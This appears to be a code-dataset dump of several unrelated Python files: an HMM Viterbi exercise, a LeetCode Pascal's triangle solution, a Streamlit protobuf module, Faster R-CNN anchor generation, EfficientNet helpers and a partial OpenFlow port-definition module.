# Backward loop.
for pos in range(length-2, -1, -1):
for current_state in range(num_states):
backward[pos, current_state] = \
logsum(backward[pos+1, :] +
transition_scores[pos, :, current_state] +
emission_scores[pos+1, :])
# Termination.
log_likelihood = logsum(backward[0, :] + initial_scores + emission_scores[0, :])
return log_likelihood, backward
# ----------
# Computes the viterbi trellis for a given sequence.
# Receives:
#
# Initial scores: (num_states) array
# Transition scores: (length-1, num_states, num_states) array
# Final scores: (num_states) array
# Emission scoress: (length, num_states) array
# ----------
def run_viterbi(self, initial_scores, transition_scores, final_scores, emission_scores):
# ----------
# Solution to Exercise 2.8
length = np.size(emission_scores, 0) # Length of the sequence.
num_states = np.size(initial_scores) # Number of states.
# Variables storing the Viterbi scores.
viterbi_scores = np.zeros([length, num_states]) + logzero()
# Variables storing the paths to backtrack.
viterbi_paths = -np.ones([length, num_states], dtype=int)
# Most likely sequence.
best_path = -np.ones(length, dtype=int)
# ----------
# Solution to Exercise 8
raise NotImplementedError("Complete Exercise 8")
#### Little guide of the implementation ####################################
# Initializatize the viterbi scores
#
# Do the double of the viterbi loop (lines 7 to 12 in the guide pdf)
# from 1 to length
# from 0 to num_states
# ...
#
# define the best_path and best_score
#
# backtrack the best_path using the viterbi paths (lines 17-18 pseudocode in the guide pdf)
#
# return best_path and best_score
############################################################################
# End of solution to Exercise 8
# ----------
def run_forward_backward(self, initial_scores, transition_scores, final_scores, emission_scores):
log_likelihood, forward = self.run_forward(initial_scores, transition_scores, final_scores, emission_scores)
print('Log-Likelihood =', log_likelihood)
log_likelihood, backward = self.run_backward(initial_scores, transition_scores, final_scores, emission_scores)
print('Log-Likelihood =', log_likelihood)
return forward, backward
| 36.742424 | 118 | 0.609897 |
acdfb57bed73c8ac61ce40bbe16a1000e07b84d4 | 604 | py | Python | src/101_200/0119_pascals-triangle-ii/pascals-triangle-ii.py | himichael/LeetCode | d54f48e785af3d47a2a67a95fd3343d2b23f8ae5 | [
"Apache-2.0"
] | 1 | 2019-12-18T06:08:47.000Z | 2019-12-18T06:08:47.000Z | src/101_200/0119_pascals-triangle-ii/pascals-triangle-ii.py | himichael/LeetCode | d54f48e785af3d47a2a67a95fd3343d2b23f8ae5 | [
"Apache-2.0"
] | 1 | 2019-05-18T09:35:22.000Z | 2019-05-18T09:35:22.000Z | src/101_200/0119_pascals-triangle-ii/pascals-triangle-ii.py | himichael/LeetCode | d54f48e785af3d47a2a67a95fd3343d2b23f8ae5 | [
"Apache-2.0"
] | null | null | null | class Solution(object):
def getRow(self, rowIndex):
"""
:type rowIndex: int
:rtype: List[int]
"""
if rowIndex<2:
return [1,1] if rowIndex==1 else [1]
res = []
pre = [1,1]
for i in xrange(2,rowIndex+1):
tmp = [1]*(i+1)
for j in xrange(i+1):
if j>0 and j<i:
tmp[j] = pre[j-1]+pre[j]
res,pre = tmp,tmp
return res
# 另一种解法
def getRow(self, rowIndex):
"""
:type rowIndex: int
:rtype: List[int]
"""
pre,res = 1,[1]
for i in xrange(1,rowIndex+1):
for j in xrange(1,i):
tmp = res[j]
res[j] += pre
pre = tmp
res.append(1)
return res | 18.30303 | 39 | 0.548013 |
acdfb5ae6a1783c9e286f1c7418f6f40e2d8b0da | 5,090 | py | Python | venv/lib/python3.9/site-packages/streamlit/proto/TimeInput_pb2.py | CMU-IDS-2022/final-project-the-evaluators | 3b9262ad1a0f7315208a94a05ea1ce38e679d01d | [
"BSD-3-Clause"
] | 1 | 2022-01-17T02:58:50.000Z | 2022-01-17T02:58:50.000Z | venv/lib/python3.9/site-packages/streamlit/proto/TimeInput_pb2.py | CMU-IDS-2022/final-project-the-evaluators | 3b9262ad1a0f7315208a94a05ea1ce38e679d01d | [
"BSD-3-Clause"
] | null | null | null | venv/lib/python3.9/site-packages/streamlit/proto/TimeInput_pb2.py | CMU-IDS-2022/final-project-the-evaluators | 3b9262ad1a0f7315208a94a05ea1ce38e679d01d | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: streamlit/proto/TimeInput.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='streamlit/proto/TimeInput.proto',
package='',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x1fstreamlit/proto/TimeInput.proto\"\x8a\x01\n\tTimeInput\x12\n\n\x02id\x18\x01 \x01(\t\x12\r\n\x05label\x18\x02 \x01(\t\x12\x0f\n\x07\x64\x65\x66\x61ult\x18\x03 \x01(\t\x12\x0c\n\x04help\x18\x04 \x01(\t\x12\x0f\n\x07\x66orm_id\x18\x05 \x01(\t\x12\r\n\x05value\x18\x06 \x01(\t\x12\x11\n\tset_value\x18\x07 \x01(\x08\x12\x10\n\x08\x64isabled\x18\x08 \x01(\x08\x62\x06proto3'
)
_TIMEINPUT = _descriptor.Descriptor(
name='TimeInput',
full_name='TimeInput',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='TimeInput.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='label', full_name='TimeInput.label', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default', full_name='TimeInput.default', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='help', full_name='TimeInput.help', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='form_id', full_name='TimeInput.form_id', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='TimeInput.value', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='set_value', full_name='TimeInput.set_value', index=6,
number=7, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='disabled', full_name='TimeInput.disabled', index=7,
number=8, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=36,
serialized_end=174,
)
DESCRIPTOR.message_types_by_name['TimeInput'] = _TIMEINPUT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
TimeInput = _reflection.GeneratedProtocolMessageType('TimeInput', (_message.Message,), {
'DESCRIPTOR' : _TIMEINPUT,
'__module__' : 'streamlit.proto.TimeInput_pb2'
# @@protoc_insertion_point(class_scope:TimeInput)
})
_sym_db.RegisterMessage(TimeInput)
# @@protoc_insertion_point(module_scope)
| 42.416667 | 394 | 0.743615 |
acdfb70039aa9cfaa6dcd4e5b1875a852ba4c8b7 | 3,208 | py | Python | lib/layer_utils/generate_anchors.py | bareblackfoot/faster-rcnn.selection | 4a77960a2b4513524d7a68c38a5b710c4d579d08 | [
"MIT"
] | null | null | null | lib/layer_utils/generate_anchors.py | bareblackfoot/faster-rcnn.selection | 4a77960a2b4513524d7a68c38a5b710c4d579d08 | [
"MIT"
] | null | null | null | lib/layer_utils/generate_anchors.py | bareblackfoot/faster-rcnn.selection | 4a77960a2b4513524d7a68c38a5b710c4d579d08 | [
"MIT"
] | null | null | null | # --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick and Sean Bell
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
# Verify that we compute the same anchors as Shaoqing's matlab implementation:
#
# >> load output/rpn_cachedir/faster_rcnn_VOC2007_ZF_stage1_rpn/anchors.mat
# >> anchors
#
# anchors =
#
# -83 -39 100 56
# -175 -87 192 104
# -359 -183 376 200
# -55 -55 72 72
# -119 -119 136 136
# -247 -247 264 264
# -35 -79 52 96
# -79 -167 96 184
# -167 -343 184 360
# array([[ -83., -39., 100., 56.],
# [-175., -87., 192., 104.],
# [-359., -183., 376., 200.],
# [ -55., -55., 72., 72.],
# [-119., -119., 136., 136.],
# [-247., -247., 264., 264.],
# [ -35., -79., 52., 96.],
# [ -79., -167., 96., 184.],
# [-167., -343., 184., 360.]])
def generate_anchors(base_size=16, ratios=[0.5, 1, 2],
scales=2 ** np.arange(3, 6)):
"""
Generate anchor (reference) windows by enumerating aspect ratios X
scales wrt a reference (0, 0, 15, 15) window.
"""
base_anchor = np.array([1, 1, base_size, base_size]) - 1
ratio_anchors = _ratio_enum(base_anchor, ratios)
anchors = np.vstack([_scale_enum(ratio_anchors[i, :], scales)
for i in range(ratio_anchors.shape[0])])
# print(anchors)
# print(anchors.shape)
# import pdb
# pdb.set_trace()
return anchors
def _whctrs(anchor):
"""
Return width, height, x center, and y center for an anchor (window).
"""
w = anchor[2] - anchor[0] + 1
h = anchor[3] - anchor[1] + 1
x_ctr = anchor[0] + 0.5 * (w - 1)
y_ctr = anchor[1] + 0.5 * (h - 1)
return w, h, x_ctr, y_ctr
def _mkanchors(ws, hs, x_ctr, y_ctr):
"""
Given a vector of widths (ws) and heights (hs) around a center
(x_ctr, y_ctr), output a set of anchors (windows).
"""
ws = ws[:, np.newaxis]
hs = hs[:, np.newaxis]
anchors = np.hstack((x_ctr - 0.5 * (ws - 1),
y_ctr - 0.5 * (hs - 1),
x_ctr + 0.5 * (ws - 1),
y_ctr + 0.5 * (hs - 1)))
return anchors
def _ratio_enum(anchor, ratios):
"""
Enumerate a set of anchors for each aspect ratio wrt an anchor.
"""
w, h, x_ctr, y_ctr = _whctrs(anchor)
size = w * h
size_ratios = size / ratios
ws = np.round(np.sqrt(size_ratios))
hs = np.round(ws * ratios)
anchors = _mkanchors(ws, hs, x_ctr, y_ctr)
return anchors
def _scale_enum(anchor, scales):
"""
Enumerate a set of anchors for each scale wrt an anchor.
"""
w, h, x_ctr, y_ctr = _whctrs(anchor)
ws = w * scales
hs = h * scales
anchors = _mkanchors(ws, hs, x_ctr, y_ctr)
return anchors
if __name__ == '__main__':
import time
t = time.time()
a = generate_anchors()
print(time.time() - t)
print(a)
from IPython import embed;
embed()
| 26.295082 | 78 | 0.545511 |
acdfb773177639b41313853775567c4a965fae36 | 12,095 | py | Python | efficientnet-pytorch/EfficientNet-PyTorch/EfficientNet-PyTorch-master/efficientnet_pytorch/utils.py | kozodoi/Kaggle_Blindness_Detection | 51bc0ed7a2d7c406dbcb40c7633730071a8823a6 | [
"MIT"
] | 12 | 2019-08-20T06:27:15.000Z | 2022-02-15T05:26:58.000Z | efficientnet-pytorch/EfficientNet-PyTorch/EfficientNet-PyTorch-master/efficientnet_pytorch/utils.py | kozodoi/Kaggle_Blindness_Detection | 51bc0ed7a2d7c406dbcb40c7633730071a8823a6 | [
"MIT"
] | null | null | null | efficientnet-pytorch/EfficientNet-PyTorch/EfficientNet-PyTorch-master/efficientnet_pytorch/utils.py | kozodoi/Kaggle_Blindness_Detection | 51bc0ed7a2d7c406dbcb40c7633730071a8823a6 | [
"MIT"
] | 7 | 2019-08-26T03:31:26.000Z | 2022-03-19T06:17:39.000Z | """
This file contains helper functions for building the model and for loading model parameters.
These helper functions are built to mirror those in the official TensorFlow implementation.
"""
import re
import math
import collections
from functools import partial
import torch
from torch import nn
from torch.nn import functional as F
from torch.utils import model_zoo
########################################################################
############### HELPERS FUNCTIONS FOR MODEL ARCHITECTURE ###############
########################################################################
# Parameters for the entire model (stem, all blocks, and head)
GlobalParams = collections.namedtuple('GlobalParams', [
'batch_norm_momentum', 'batch_norm_epsilon', 'dropout_rate',
'num_classes', 'width_coefficient', 'depth_coefficient',
'depth_divisor', 'min_depth', 'drop_connect_rate', 'image_size'])
# Parameters for an individual model block
BlockArgs = collections.namedtuple('BlockArgs', [
'kernel_size', 'num_repeat', 'input_filters', 'output_filters',
'expand_ratio', 'id_skip', 'stride', 'se_ratio'])
# Change namedtuple defaults
GlobalParams.__new__.__defaults__ = (None,) * len(GlobalParams._fields)
BlockArgs.__new__.__defaults__ = (None,) * len(BlockArgs._fields)
def relu_fn(x):
""" Swish activation function """
return x * torch.sigmoid(x)
def round_filters(filters, global_params):
""" Calculate and round number of filters based on depth multiplier. """
multiplier = global_params.width_coefficient
if not multiplier:
return filters
divisor = global_params.depth_divisor
min_depth = global_params.min_depth
filters *= multiplier
min_depth = min_depth or divisor
new_filters = max(min_depth, int(filters + divisor / 2) // divisor * divisor)
if new_filters < 0.9 * filters: # prevent rounding by more than 10%
new_filters += divisor
return int(new_filters)
def round_repeats(repeats, global_params):
""" Round number of filters based on depth multiplier. """
multiplier = global_params.depth_coefficient
if not multiplier:
return repeats
return int(math.ceil(multiplier * repeats))
def drop_connect(inputs, p, training):
""" Drop connect. """
if not training: return inputs
batch_size = inputs.shape[0]
keep_prob = 1 - p
random_tensor = keep_prob
random_tensor += torch.rand([batch_size, 1, 1, 1], dtype=inputs.dtype, device=inputs.device)
binary_tensor = torch.floor(random_tensor)
output = inputs / keep_prob * binary_tensor
return output
def get_same_padding_conv2d(image_size=None):
""" Chooses static padding if you have specified an image size, and dynamic padding otherwise.
Static padding is necessary for ONNX exporting of models. """
if image_size is None:
return Conv2dDynamicSamePadding
else:
return partial(Conv2dStaticSamePadding, image_size=image_size)
class Conv2dDynamicSamePadding(nn.Conv2d):
""" 2D Convolutions like TensorFlow, for a dynamic image size """
def __init__(self, in_channels, out_channels, kernel_size, stride=1, dilation=1, groups=1, bias=True):
super().__init__(in_channels, out_channels, kernel_size, stride, 0, dilation, groups, bias)
self.stride = self.stride if len(self.stride) == 2 else [self.stride[0]]*2
def forward(self, x):
ih, iw = x.size()[-2:]
kh, kw = self.weight.size()[-2:]
sh, sw = self.stride
oh, ow = math.ceil(ih / sh), math.ceil(iw / sw)
pad_h = max((oh - 1) * self.stride[0] + (kh - 1) * self.dilation[0] + 1 - ih, 0)
pad_w = max((ow - 1) * self.stride[1] + (kw - 1) * self.dilation[1] + 1 - iw, 0)
if pad_h > 0 or pad_w > 0:
x = F.pad(x, [pad_w//2, pad_w - pad_w//2, pad_h//2, pad_h - pad_h//2])
return F.conv2d(x, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)
class Conv2dStaticSamePadding(nn.Conv2d):
""" 2D Convolutions like TensorFlow, for a fixed image size"""
def __init__(self, in_channels, out_channels, kernel_size, image_size=None, **kwargs):
super().__init__(in_channels, out_channels, kernel_size, **kwargs)
self.stride = self.stride if len(self.stride) == 2 else [self.stride[0]] * 2
# Calculate padding based on image size and save it
assert image_size is not None
ih, iw = image_size if type(image_size) == list else [image_size, image_size]
kh, kw = self.weight.size()[-2:]
sh, sw = self.stride
oh, ow = math.ceil(ih / sh), math.ceil(iw / sw)
pad_h = max((oh - 1) * self.stride[0] + (kh - 1) * self.dilation[0] + 1 - ih, 0)
pad_w = max((ow - 1) * self.stride[1] + (kw - 1) * self.dilation[1] + 1 - iw, 0)
if pad_h > 0 or pad_w > 0:
self.static_padding = nn.ZeroPad2d((pad_w // 2, pad_w - pad_w // 2, pad_h // 2, pad_h - pad_h // 2))
else:
self.static_padding = Identity()
def forward(self, x):
x = self.static_padding(x)
x = F.conv2d(x, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)
return x
class Identity(nn.Module):
def __init__(self,):
super(Identity, self).__init__()
def forward(self, input):
return input
########################################################################
############## HELPERS FUNCTIONS FOR LOADING MODEL PARAMS ##############
########################################################################
def efficientnet_params(model_name):
""" Map EfficientNet model name to parameter coefficients. """
params_dict = {
# Coefficients: width,depth,res,dropout
'efficientnet-b0': (1.0, 1.0, 224, 0.2),
'efficientnet-b1': (1.0, 1.1, 240, 0.2),
'efficientnet-b2': (1.1, 1.2, 260, 0.3),
'efficientnet-b3': (1.2, 1.4, 300, 0.3),
'efficientnet-b4': (1.4, 1.8, 380, 0.4),
'efficientnet-b5': (1.6, 2.2, 456, 0.4),
'efficientnet-b6': (1.8, 2.6, 528, 0.5),
'efficientnet-b7': (2.0, 3.1, 600, 0.5),
}
return params_dict[model_name]
class BlockDecoder(object):
""" Block Decoder for readability, straight from the official TensorFlow repository """
@staticmethod
def _decode_block_string(block_string):
""" Gets a block through a string notation of arguments. """
assert isinstance(block_string, str)
ops = block_string.split('_')
options = {}
for op in ops:
splits = re.split(r'(\d.*)', op)
if len(splits) >= 2:
key, value = splits[:2]
options[key] = value
# Check stride
assert (('s' in options and len(options['s']) == 1) or
(len(options['s']) == 2 and options['s'][0] == options['s'][1]))
return BlockArgs(
kernel_size=int(options['k']),
num_repeat=int(options['r']),
input_filters=int(options['i']),
output_filters=int(options['o']),
expand_ratio=int(options['e']),
id_skip=('noskip' not in block_string),
se_ratio=float(options['se']) if 'se' in options else None,
stride=[int(options['s'][0])])
@staticmethod
def _encode_block_string(block):
"""Encodes a block to a string."""
args = [
'r%d' % block.num_repeat,
'k%d' % block.kernel_size,
's%d%d' % (block.strides[0], block.strides[1]),
'e%s' % block.expand_ratio,
'i%d' % block.input_filters,
'o%d' % block.output_filters
]
if 0 < block.se_ratio <= 1:
args.append('se%s' % block.se_ratio)
if block.id_skip is False:
args.append('noskip')
return '_'.join(args)
@staticmethod
def decode(string_list):
"""
Decodes a list of string notations to specify blocks inside the network.
:param string_list: a list of strings, each string is a notation of block
:return: a list of BlockArgs namedtuples of block args
"""
assert isinstance(string_list, list)
blocks_args = []
for block_string in string_list:
blocks_args.append(BlockDecoder._decode_block_string(block_string))
return blocks_args
@staticmethod
def encode(blocks_args):
"""
Encodes a list of BlockArgs to a list of strings.
:param blocks_args: a list of BlockArgs namedtuples of block args
:return: a list of strings, each string is a notation of block
"""
block_strings = []
for block in blocks_args:
block_strings.append(BlockDecoder._encode_block_string(block))
return block_strings
def efficientnet(width_coefficient=None, depth_coefficient=None, dropout_rate=0.2,
drop_connect_rate=0.2, image_size=None, num_classes=1000):
""" Creates a efficientnet model. """
blocks_args = [
'r1_k3_s11_e1_i32_o16_se0.25', 'r2_k3_s22_e6_i16_o24_se0.25',
'r2_k5_s22_e6_i24_o40_se0.25', 'r3_k3_s22_e6_i40_o80_se0.25',
'r3_k5_s11_e6_i80_o112_se0.25', 'r4_k5_s22_e6_i112_o192_se0.25',
'r1_k3_s11_e6_i192_o320_se0.25',
]
blocks_args = BlockDecoder.decode(blocks_args)
global_params = GlobalParams(
batch_norm_momentum=0.99,
batch_norm_epsilon=1e-3,
dropout_rate=dropout_rate,
drop_connect_rate=drop_connect_rate,
# data_format='channels_last', # removed, this is always true in PyTorch
num_classes=num_classes,
width_coefficient=width_coefficient,
depth_coefficient=depth_coefficient,
depth_divisor=8,
min_depth=None,
image_size=image_size,
)
return blocks_args, global_params
def get_model_params(model_name, override_params):
""" Get the block args and global params for a given model """
if model_name.startswith('efficientnet'):
w, d, s, p = efficientnet_params(model_name)
# note: all models have drop connect rate = 0.2
blocks_args, global_params = efficientnet(
width_coefficient=w, depth_coefficient=d, dropout_rate=p, image_size=s)
else:
raise NotImplementedError('model name is not pre-defined: %s' % model_name)
if override_params:
# ValueError will be raised here if override_params has fields not included in global_params.
global_params = global_params._replace(**override_params)
return blocks_args, global_params
url_map = {
'efficientnet-b0': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b0-355c32eb.pth',
'efficientnet-b1': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b1-f1951068.pth',
'efficientnet-b2': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b2-8bb594d6.pth',
'efficientnet-b3': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b3-5fb5a3c3.pth',
'efficientnet-b4': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b4-6ed6700e.pth',
'efficientnet-b5': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b5-b6417697.pth',
'efficientnet-b6': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b6-c76e70fd.pth',
'efficientnet-b7': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b7-dcc49843.pth',
}
def load_pretrained_weights(model, model_name, load_fc=True):
""" Loads pretrained weights, and downloads if loading for the first time. """
state_dict = model_zoo.load_url(url_map[model_name])
if load_fc:
model.load_state_dict(state_dict)
else:
state_dict.pop('_fc.weight')
state_dict.pop('_fc.bias')
res = model.load_state_dict(state_dict, strict=False)
assert str(res.missing_keys) == str(['_fc.weight', '_fc.bias']), 'issue loading pretrained weights'
print('Loaded pretrained weights for {}'.format(model_name))
| 40.316667 | 112 | 0.638198 |
acdfb7f66ca391eb61e26ffe487bdb1386aeac33 | 15,160 | py | Python | pyof/v0x05/common/port.py | RoyAl82/VIPProject | 1bfe7929d1e2dc663e3c30f6a0685224ca319618 | [
"MIT"
] | null | null | null | pyof/v0x05/common/port.py | RoyAl82/VIPProject | 1bfe7929d1e2dc663e3c30f6a0685224ca319618 | [
"MIT"
] | null | null | null | pyof/v0x05/common/port.py | RoyAl82/VIPProject | 1bfe7929d1e2dc663e3c30f6a0685224ca319618 | [
"MIT"
] | null | null | null | """Defines physical port classes and related items."""
# System imports
from enum import IntEnum
# Local source tree imports
from pyof.foundation.base import GenericBitMask, GenericStruct
from pyof.foundation.basic_types import (Char, FixedTypeList, HWAddress, Pad, UBInt32, UBInt16, UBInt8)
from pyof.foundation.constants import OFP_MAX_PORT_NAME_LEN, OFP_ETH_ALEN
# Third-party imports
__all__ = ('ListOfPorts', 'Port', 'PortNo', 'PortConfig', 'PortFeatures',
'PortState')
class PortNo(IntEnum):
"""Port numbering.
Ports are numbered starting from 1.
"""
#: Maximum number of physical and logical switch ports.
OFPP_MAX = 0xffffff00
# Reserved OpenFlow port (fake output "ports")
#: Send the packet out the input port. This reserved port must be
#: explicitly used in order to send back out of the input port.
OFPP_IN_PORT = 0xfffffff8
#: Submit the packet to the first flow table
#: NB: This destination port can only be used in packet-out messages.
OFPP_TABLE = 0xfffffff9
#: Process with normal L2/L3 switching.
OFPP_NORMAL = 0xfffffffa
#: All physical ports in VLAN, except input port and thos blocked or link
#: down.
OFPP_FLOOD = 0xfffffffb
#: All physical ports except input port
OFPP_ALL = 0xfffffffc
#: Send to controller
OFPP_CONTROLLER = 0xfffffffd
#: Local openflow "port"
OFPP_LOCAL = 0xfffffffe
#: Wildcard port used only for flow mod (delete) and flow stats requests.
#: Selects all flows regardless of output port (including flows with no
#: output port).
OFPP_ANY = 0xffffffff
class PortDescPropType(IntEnum):
"""Port description property types"""
# Ethernet property
OFPPDPT_ETHERNET = 0
# Optical property
OFPPDPT_OPTICAL = 1
# Experimenter property
OFPPDPT_EXPERIMENTER = 0xfff
class OpticalPortFeatures(GenericBitMask):
"""Features of optical ports available in switch. """
# Receiver is tunable.
OFPOPF_RX_TUNE = 1 << 0
# Transmit is tunable.
OFPOPF_TX_TUNE = 1 << 1
# Power is configurable.
OFPOPF_TX_PWR = 1 << 2
# Use Frequency, not wavelength
OFPOPF_USE_FREQ = 1 << 3
class PortConfig(GenericBitMask):
"""Flags to indicate behavior of the physical port.
These flags are used in :class:`Port` to describe the current
configuration. They are used in the
:class:`~pyof.v0x05.controller2switch.port_mod.PortMod`
message to configure the port's behavior.
The :attr:`OFPPC_PORT_DOWN` bit indicates that the port has been
administratively brought down and should not be used by OpenFlow. The
:attr:`~OFPPC_NO_RECV` bit indicates that packets received on that port
should be ignored. The :attr:`OFPPC_NO_FWD` bit indicates that OpenFlow
should not send packets to that port. The :attr:`OFPPC_NO_PACKET_IN` bit
indicates that packets on that port that generate a table miss should never
trigger a packet-in message to the controller.
In general, the port config bits are set by the controller and not changed
by the switch. Those bits may be useful for the controller to implement
protocols such as STP or BFD. If the port config bits are changed by the
switch through another administrative interface, the switch sends an
:attr:`OFPT_PORT_STATUS` message to notify the controller of the change.
"""
#: Port is administratively down.
OFPPC_PORT_DOWN = 1 << 0
#: Drop all packets received by port.
OFPPC_NO_RECV = 1 << 2
#: Drop packets forwarded to port.
OFPPC_NO_FWD = 1 << 5
#: Do not send packet-in msgs for port.
OFPPC_NO_PACKET_IN = 1 << 6
class PortFeatures(GenericBitMask):
"""Physical ports features.
The curr, advertised, supported, and peer fields indicate link modes
(speed and duplexity), link type (copper/fiber) and link features
(autonegotiation and pause).
Multiple of these flags may be set simultaneously. If none of the port
speed flags are set, the max_speed or curr_speed are used.
The curr_speed and max_speed fields indicate the current and maximum bit
rate (raw transmission speed) of the link in kbps. The number should be
rounded to match common usage. For example, an optical 10 Gb Ethernet port
should have this field set to 10000000 (instead of 10312500), and an OC-192
port should have this field set to 10000000 (instead of 9953280).
The max_speed fields indicate the maximum configured capacity of the link,
whereas the curr_speed indicates the current capacity. If the port is a LAG
with 3 links of 1Gb/s capacity, with one of the ports of the LAG being
down, one port auto-negotiated at 1Gb/s and 1 port auto-negotiated at
100Mb/s, the max_speed is 3 Gb/s and the curr_speed is 1.1 Gb/s.
"""
#: 10 Mb half-duplex rate support.
OFPPF_10MB_HD = 1 << 0
#: 10 Mb full-duplex rate support.
OFPPF_10MB_FD = 1 << 1
#: 100 Mb half-duplex rate support.
OFPPF_100MB_HD = 1 << 2
#: 100 Mb full-duplex rate support.
OFPPF_100MB_FD = 1 << 3
#: 1 Gb half-duplex rate support.
OFPPF_1GB_HD = 1 << 4
#: 1 Gb full-duplex rate support.
OFPPF_1GB_FD = 1 << 5
#: 10 Gb full-duplex rate support.
OFPPF_10GB_FD = 1 << 6
#: 40 Gb full-duplex rate support.
OFPPF_40GB_FD = 1 << 7
#: 100 Gb full-duplex rate support.
OFPPF_100GB_FD = 1 << 8
#: 1 Tb full-duplex rate support.
OFPPF_1TB_FD = 1 << 9
#: Other rate, not in the list
OFPPF_OTHER = 1 << 10
#: Copper medium.
OFPPF_COPPER = 1 << 11
#: Fiber medium.
OFPPF_FIBER = 1 << 12
#: Auto-negotiation.
OFPPF_AUTONEG = 1 << 13
#: Pause.
OFPPF_PAUSE = 1 << 14
#: Asymmetric pause.
OFPPF_PAUSE_ASYM = 1 << 15
class PortState(GenericBitMask):
"""Current state of the physical port.
These are not configurable from the controller.
The port state bits represent the state of the physical link or switch
protocols outside of OpenFlow. The :attr:`~PortConfig.OFPPS_LINK_DOWN` bit
indicates the the physical link is not present. The
:attr:`~PortConfig.OFPPS_BLOCKED` bit indicates that a switch protocol
outside of OpenFlow, such as 802.1D Spanning Tree, is preventing the use of
that port with :attr:`~PortConfig.OFPP_FLOOD`.
All port state bits are read-only and cannot be changed by the controller.
When the port flags are changed, the switch sends an
:attr:`v0x05.common.header.Type.OFPT_PORT_STATUS` message to notify the
controller of the change.
"""
#: Not physical link present.
OFPPS_LINK_DOWN = 1 << 0
#: Port is blocked.
OFPPS_BLOCKED = 1 << 1
#: Live for Fast Failover Group.
OFPPS_LIVE = 1 << 2
# Classes
class Port(GenericStruct):
"""Description of a port.
The port_no field uniquely identifies a port within a switch. The hw_addr
field typically is the MAC address for the port;
:data:`.OFP_MAX_ETH_ALEN` is 6. The name field is a null-terminated string
containing a human-readable name for the interface.
The value of :data:`.OFP_MAX_PORT_NAME_LEN` is 16.
:attr:`curr`, :attr:`advertised`, :attr:`supported` and :attr:`peer` fields
indicate link modes (speed and duplexity), link type (copper/fiber) and
link features (autonegotiation and pause). They are bitmaps of
:class:`PortFeatures` enum values that describe features.
Multiple of these flags may be set simultaneously. If none of the port
speed flags are set, the :attr:`max_speed` or :attr:`curr_speed` are used.
"""
port_no = UBInt32()
length = UBInt16()
pad = Pad(2)
hw_addr = HWAddress()
pad2 = Pad(2) # Align to 64 bits
name = Char(length=OFP_MAX_PORT_NAME_LEN) # Null terminated
config = UBInt32(enum_ref=PortConfig) # Bitmap of OFPPC_* flags
state = UBInt32(enum_ref=PortState) # Bitmap of OFPPS_* flags
#pad = Pad(4)
#hw_addr = HWAddress()
#pad2 = Pad(2)
"""
These are not existed in version 1.4 specifications
curr = UBInt32(enum_ref=PortFeatures)
advertised = UBInt32(enum_ref=PortFeatures)
supported = UBInt32(enum_ref=PortFeatures)
peer = UBInt32(enum_ref=PortFeatures)
curr_speed = UBInt32()
max_speed = UBInt32()
"""
def __init__(self, port_no=None, hw_addr=None, name=None, config=None,
state=None):
